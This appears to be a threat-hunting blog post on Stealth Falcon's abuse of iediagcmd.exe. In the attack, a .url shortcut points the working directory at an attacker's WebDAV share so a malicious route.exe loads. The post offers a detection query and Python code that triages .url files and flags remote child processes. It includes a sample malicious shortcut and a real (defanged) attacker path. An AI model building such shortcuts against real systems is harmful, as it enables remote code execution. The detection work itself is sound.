163. A Curious Case of Iediagcmd.exe Abuse

Hello everyone!

Reading Check Point's report on Stealth Falcon activities, I spotted an interesting way of abusing iediagcmd.exe.

The adversary uses malicious .url files. The URL parameter points to iediagcmd.exe, the Internet Explorer diagnostics tool under Program Files. Normally this executable spawns additional processes to collect diagnostic data, including route.exe, and it starts them by name rather than by full path. The .url file also changes the working folder to an attacker-controlled WebDAV server, and because CreateProcess searches the parent's current directory before System32 when resolving an unqualified executable name, iediagcmd.exe runs the route.exe from \\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr\route.exe (Horus Loader) instead of the legitimate one in the system32 folder.

Of course, we can use this for detection and search for iediagcmd.exe executing files from WebDAV servers, for example:

event_type: "processcreatewin" AND
proc_p_file_path: "iediagcmd.exe" AND
proc_file_path: "DavWWWRoot"

Two caveats: matching on "DavWWWRoot" only catches the WebDAV Mini-Redirector path syntax, so for this parent also consider any child image path that begins with "\\", and do not limit the rule to route.exe, since any utility iediagcmd.exe launches by name can be hijacked the same way.
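To make both halves of the post concrete, here is an added Python example (not code from the original post or from Check Point's report). It does two things: triages a .url file for the combination described above, a URL that launches iediagcmd.exe while WorkingDirectory points at a remote share, and runs a detection over process-creation events that generalizes the query above to any UNC path and any child image. The [InternetShortcut] section with URL and WorkingDirectory keys is the standard .url format; the sample shortcut contents, the event records and the plain-SMB variant are constructed for illustration, and the event field names simply mirror the query above.

```python
"""Hunting for the iediagcmd.exe abuse described above.

Added example, not code from the original post or from Check Point.
All sample data below is constructed; event field names mirror the
query in the post, everything else is an assumption.
"""
import configparser
import re
from typing import Dict, Iterable, List, Optional
from urllib.parse import unquote

IEDIAGCMD = "iediagcmd.exe"

# WebDAV Mini-Redirector paths look like \\host@ssl@443\DavWWWRoot\...;
# plain SMB shares look like \\host\share\... . Both begin with two separators.
# Forward slashes are accepted because the post shows a mixed-separator path.
_UNC_PREFIX = re.compile(r"^[\\/]{2}")


def basename(path: str) -> str:
    """Lower-cased last component of a Windows path or file:/// URL."""
    cleaned = unquote(path.strip().strip('"'))
    return re.split(r"[\\/]", cleaned)[-1].lower()


def is_remote_path(path: str) -> bool:
    """True for any UNC path; the WebDAV markers are checked too, in case the
    telemetry normalised the leading separators away."""
    p = path.strip().strip('"')
    lowered = p.lower()
    return bool(_UNC_PREFIX.match(p)) or "davwwwroot" in lowered or "@ssl" in lowered


def triage_url_file(text: str) -> Optional[Dict[str, str]]:
    """Return the URL/WorkingDirectory pair if the shortcut launches
    iediagcmd.exe from a remote working directory, else None."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",), strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:          # not an INI-style file at all
        return None
    if not cp.has_section("InternetShortcut"):
        return None
    section = cp["InternetShortcut"]    # configparser lower-cases option names
    url = section.get("url", "")
    workdir = section.get("workingdirectory", "")
    if basename(url) == IEDIAGCMD and is_remote_path(workdir):
        return {"url": url, "working_directory": workdir}
    return None


def detect_remote_children(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Process-creation events where iediagcmd.exe launched a child image from
    a remote path. Broader than the post's query: any UNC path counts, not only
    ones containing 'DavWWWRoot', and any child name, not only route.exe."""
    hits = []
    for ev in events:
        if ev.get("event_type") != "processcreatewin":
            continue
        parent = ev.get("proc_p_file_path", "")
        child = ev.get("proc_file_path", "")
        if basename(parent) == IEDIAGCMD and is_remote_path(child):
            hits.append(ev)
    return hits


# --- constructed sample data (assumptions, not observed artefacts) ----------

SAMPLE_URL_FILE = r"""[InternetShortcut]
URL=file:///C:/Program Files/Internet Explorer/iediagcmd.exe
WorkingDirectory=\\summerartcamp[.]net@ssl@443\DavWWWRoot\OSYxaOjr
IconIndex=0
"""

BENIGN_URL_FILE = r"""[InternetShortcut]
URL=https://example.com/
"""

SAMPLE_EVENTS = [
    {   # legitimate diagnostic run: child resolved from System32
        "event_type": "processcreatewin",
        "proc_p_file_path": r"C:\Program Files\Internet Explorer\iediagcmd.exe",
        "proc_file_path": r"C:\Windows\System32\route.exe",
    },
    {   # the post's case: route.exe pulled from the WebDAV working directory
        "event_type": "processcreatewin",
        "proc_p_file_path": r"C:\Program Files\Internet Explorer\iediagcmd.exe",
        "proc_file_path": r"\\summerartcamp[.]net@ssl@443\DavWWWRoot\OSYxaOjr\route.exe",
    },
    {   # constructed SMB variant: no 'DavWWWRoot' token for the post's query to match
        "event_type": "processcreatewin",
        "proc_p_file_path": r"C:\Program Files\Internet Explorer\iediagcmd.exe",
        "proc_file_path": r"\\10.0.0.5\tools\route.exe",
    },
    {   # remote child, but a different parent: out of scope for this rule
        "event_type": "processcreatewin",
        "proc_p_file_path": r"C:\Windows\explorer.exe",
        "proc_file_path": r"\\fileserver\tools\putty.exe",
    },
]

if __name__ == "__main__":
    print("url file:", triage_url_file(SAMPLE_URL_FILE))
    for hit in detect_remote_children(SAMPLE_EVENTS):
        print("hit:", hit["proc_file_path"])
```

Run it as a script to see the .url triage result and the two event hits; drop the SMB sample if your environment only cares about the WebDAV syntax, but note that the search-order mechanism does not depend on it.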

See you tomorrow!
